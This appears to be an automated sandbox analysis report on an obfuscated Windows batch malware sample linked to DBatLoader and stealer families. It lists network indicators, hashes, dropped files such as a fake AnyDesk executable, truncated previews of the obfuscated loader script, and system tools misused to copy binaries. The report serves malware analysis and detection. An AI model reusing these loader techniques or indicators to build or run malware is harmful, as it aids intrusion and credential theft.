                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                HQV-224647.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.102.77.43
                                                                                                                                                valid.sh.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                • 185.102.77.43

                                                                                                                                                Dropped Files

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                C:\Users\Public\alpha.exeDocumentazione_Doganale_richieste_di_copia.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                  78326473_PDF.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                    iuhmzvlH.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                      USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                            #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                              #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                TZH3Uk8x45.batGet hashmaliciousDBatLoader, PureLog Stealer, XWormBrowse
                                                                                                                                                                  Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Users\Public\AnyDesk.jpeg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\Public\kn.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2785282
                                                                                                                                                                    Entropy (8bit):3.9059073213640443
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:qJ9rSnLUBf51zmDG5c2dvSxZXBsmvXd61bcEzjaQOvWKhDkqVAgUxTmOwA6UGeL5:M
                                                                                                                                                                    MD5:5701D503C293645679D856D0C494B94E
                                                                                                                                                                    SHA1:71D664AD536D21ADEDFB84B3F9A16FC89165C1E5
                                                                                                                                                                    SHA-256:CE18404F625BF524666DB80E18E715DD93C20FFB33508ADFC0FE2DC1B9160D3C
                                                                                                                                                                    SHA-512:2805AB3B2CAE50847D9D0E77CCC92FB8F819C8D1BFAD2ABF61BB5F442AD3F77C448C1669C3ADDDDCD201148E8B5303093F853D1BC9C076727FA739D3A8154443
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900bc060000800e0000000000dcd806000010000000e006000000400000100000000200000400000000000000040000000000000000e01500000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000701400a228000000401500009a00000000000000000000000000000000000000c014007077000000000000000000000000000000000000000000000000000000b0140018000000000000000000000000000000000000008c7714004c0600000000000000000000000000000000000000000000

                                                                                                                                                                    C:\Users\Public\Libraries\AnyDesk.PIF

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\Public\kn.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1392640
                                                                                                                                                                    Entropy (8bit):7.208071169696138
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:UxxWMyBNKhfrnjjyal3sTcueSG3YHkfPFLb62+bJb7xtP:WLMulhBFLb67VxtP
                                                                                                                                                                    MD5:A8AF2D572217E48EEEBDF7DD135F90CD
                                                                                                                                                                    SHA1:79130F4D66F04C8B6CF6D88307039478060DA9E9
                                                                                                                                                                    SHA-256:5687AD48C8B8268F79CB520B632175BEADD8CDF7B6E6431A636A518774D47FAA
                                                                                                                                                                    SHA-512:3385579E987E19DAC4A069510AB9204ECB98C6655D86680668EEE05BCC4901809D9D3F5A30D0A4522DDE45288DAE1F2110988010389A4597FF4B623E5665C596
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...........................p...(...@..........................pw...................................................w..L............................text...8........................... ..`.itext..$........................... ..`.data...T@.......B..................@....bss.....6...0...........................idata...(...p...*..................@....tls....4............,...................rdata...............,..............@..@.reloc..pw.......x..................@..B.rsrc........@......................@..@.....................@..............@..@................................................................................................

                                                                                                                                                                    C:\Users\Public\Libraries\PNO

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:M:M
                                                                                                                                                                    MD5:E573012ACD22A447024A0E2BD10D6B23
                                                                                                                                                                    SHA1:386B326345C2B74BD84A0A567A674B35AE332C3D
                                                                                                                                                                    SHA-256:FB0615E4C79607329C3229D5D55189F680F6FF8EDED6EDE9186E5A89BFA532CA
                                                                                                                                                                    SHA-512:AC64526E3E5B09F2423FB3DE38FDDDABFE522DA48F959F9C3B63238615C5971493B44EB9B383B4CA3A955398308275A188A54B3B15832BD56580B5CBDE38FA3A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:46..

                                                                                                                                                                    C:\Users\Public\Libraries\aoikokpI.cmd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):62357
                                                                                                                                                                    Entropy (8bit):4.705712327109906
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                    MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                    SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                    SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                    SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                                                                    C:\Users\Public\alpha.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):289792
                                                                                                                                                                    Entropy (8bit):6.135598950357573
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                                                                                    MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                                                                                    SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                                                                                    SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 78326473_PDF.cmd, Detection: malicious, Browse
                                                                                                                                                                    • Filename: iuhmzvlH.cmd, Detection: malicious, Browse
                                                                                                                                                                    • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                                                                                                                                                    • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                                                                                                    • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                                                                    • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                                                                                                                                                    • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                                                                                                                                                    • Filename: TZH3Uk8x45.bat, Detection: malicious, Browse
                                                                                                                                                                    • Filename: Payment.cmd, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\Public\alpha.pif

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):236544
                                                                                                                                                                    Entropy (8bit):6.4416694948877025
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                    MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                    SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                    SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\Public\kn.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):1651712
                                                                                                                                                                    Entropy (8bit):6.144018815244304
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                                                                                                    MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                    SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                                                                                                    SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                                                                                                    SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                                                                                                                                                    \Device\Null

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):564
                                                                                                                                                                    Entropy (8bit):4.559213258257705
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNBG:/pLExT6cp7u0wQakn4al4t8Nd
                                                                                                                                                                    MD5:0EC1978C7DEABF43A4FC760EC68F2A60
                                                                                                                                                                    SHA1:887D9B6EE210AFAF91496A6F2F2C99B255B8DDE2
                                                                                                                                                                    SHA-256:031E9AA615CABA557C9DAC4EB8280AD0535CE9817B9C65BFFBADB77DCEBAD51B
                                                                                                                                                                    SHA-512:31A919374C8E4A6C1C126C7C9630D49EA2CC5715627746857CADFD79918DE9865036B44A758DA83C1F703299804108B828246780B595296A8C132FB1A6EB7557
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Destination File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 0.62 seconds.....

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
                                                                                                                                                                    Entropy (8bit):4.954128308829519
                                                                                                                                                                    TrID:
                                                                                                                                                                      File name:A1 igazol#U00e1s.cmd
                                                                                                                                                                      File size:3'839'564 bytes
                                                                                                                                                                      MD5:ebdec3ea8aada5aae98146f1b61a13ed
                                                                                                                                                                      SHA1:9ed537ca66a14b296010eccdde716b1b1a629fe2
                                                                                                                                                                      SHA256:6650a769ac035e23964c16c27df892d7725f415dee92582a4c7b4ceeef7345b2
                                                                                                                                                                      SHA512:c733cb6cf2754bf58ed5729357307dfb311c2e571b273c199a079d0ef96526a23fa8b0e235dc4ff07f77af61f94d32bb26561eb2b4affcd5b71c0c0c649a471e
                                                                                                                                                                      SSDEEP:49152:bWnHE/6TEgA8/WHmZI3Oqz0oXp2jrCbM799GY:2
                                                                                                                                                                      TLSH:270693E339AD1DDD2B0532DBB7CFF5640A5FD8416B83DEE4C4D2058A101EACB25889B9
                                                                                                                                                                      File Content Preview:COMCOM@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ....

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:9686878b929a9886

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-11-27T13:22:15.857386+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706185.102.77.43443TCP

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 27, 2024 13:22:13.780183077 CET49705443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:13.780213118 CET44349705185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:13.780293941 CET49705443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:14.057151079 CET49705443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:14.057216883 CET44349705185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:14.057287931 CET49705443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:14.157823086 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:14.157839060 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:14.157915115 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:14.160888910 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:14.160898924 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:15.857186079 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:15.857386112 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:15.859956980 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:15.859965086 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:15.860225916 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:15.906609058 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:15.910270929 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:15.955343962 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422772884 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422797918 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422805071 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422847033 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.422861099 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422877073 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.464633942 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.521800995 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.521811008 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.521840096 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.521895885 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.521961927 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.624166012 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.624176025 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.624234915 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.649373055 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.649379969 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.649451971 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.682934999 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.682943106 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.682997942 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.683043003 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.721307039 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.721379042 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.816149950 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.816404104 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.832870007 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.833175898 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.846570969 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.846808910 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.864449978 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.864609957 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.874861002 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.874949932 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.883163929 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.883239985 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.932704926 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.932843924 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.941596031 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.941696882 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.015115976 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.015197039 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.025475025 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.025621891 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.033179998 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.033272028 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.041534901 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.041621923 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.048827887 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.048908949 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.059134007 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.059220076 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.065083027 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.065160036 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.071249962 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.071337938 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.076630116 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.076704979 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.084156036 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.084232092 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.127161980 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.127270937 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.133836031 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.133943081 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.139306068 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.139398098 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.215012074 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.215221882 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.219110012 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.219192982 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.223717928 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.223884106 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.229712963 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.229779959 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.233931065 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.234035015 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.238516092 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.238584995 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.243010044 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.243088007 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.248789072 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.248861074 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.253261089 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.253344059 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.258460999 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.258527994 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.262945890 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.263020039 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.266457081 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.266551971 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.330703974 CET44349706185.102.77.43192.168.2.8
